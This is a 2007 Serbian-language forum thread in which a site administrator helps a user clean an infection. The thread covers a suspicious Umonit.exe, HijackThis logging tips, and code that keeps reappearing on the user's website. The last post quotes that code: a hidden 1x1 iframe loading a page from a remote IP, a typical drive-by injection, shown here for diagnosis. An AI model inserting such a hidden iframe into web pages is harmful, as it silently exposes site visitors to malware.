|
Poslao: 18 Nov 2007 21:59
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Jel koristis integrisanu Intelovu graficku?
Nista ne mogu da nadjem, jedino bih rekao da probamo da onaj Umonit.exe sklonis iz System32 foldera, pa da vidimo sta ce biti.
Ni jedan AV ne detektuje taj fajl kao maliciozan, ali sam naisao na netu na par tekstova u kojima ljudi tvrde da je u pitanju trojanac.
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 22:10
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
Da imam intelovu graficku.
Da ga obrisem jednostavno?
|
|
|
|
|
|
|
Poslao: 18 Nov 2007 22:13
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Prebaci u neki drugi folder (neki koji ces ti sam kreirati).
Nismo sigurni da je maliciozan, tako da je bolje imati ga u rezervi ukoliko ispadne da nesto nece da funkcionise bez njega.
|
|
|
|
|
|
|
Poslao: 20 Nov 2007 12:14
|
offline
- Stenley
- Zaslužni građanin
- Pridružio: 01 Mar 2005
- Poruke: 549
- Gde živiš: Apatin
|
Ok, javicu rezultate.
Dopuna: 20 Nov 2007 12:14
Kod se opet pojavljuje.
Ne znam sta da radim dalje...
|
|
|
|
|
|
|
Poslao: 20 Nov 2007 17:53
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Nisi pratio sve sto sam ti napisao u ranijim uputstvima.
Molim te promeni imena foldera i samog fajla HijackThisa. Gomila infekcija se privremeno ugasi ukoliko primete HijcakThis u task manageru.
Drugo, molim te pogasi nepotrebne programe dok pravis logove (ICQ i ostalo).
|
|
|
|
|
|
|
|
|
Poslao: 28 Nov 2007 22:37
|
offline
- bobby
- Administrator
- Pridružio: 04 Sep 2003
- Poruke: 24135
- Gde živiš: Wien
|
Stenley ::http://www.mycity.rs/Ambulanta/Nepoznat-kod-na-sajtu_2.html
<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>
Taj IP je sada dostupan, pokusaj da ga ulovis.
HTTP status 500 - mrtav, tj. TimeOut
|
|
|
|
|
|
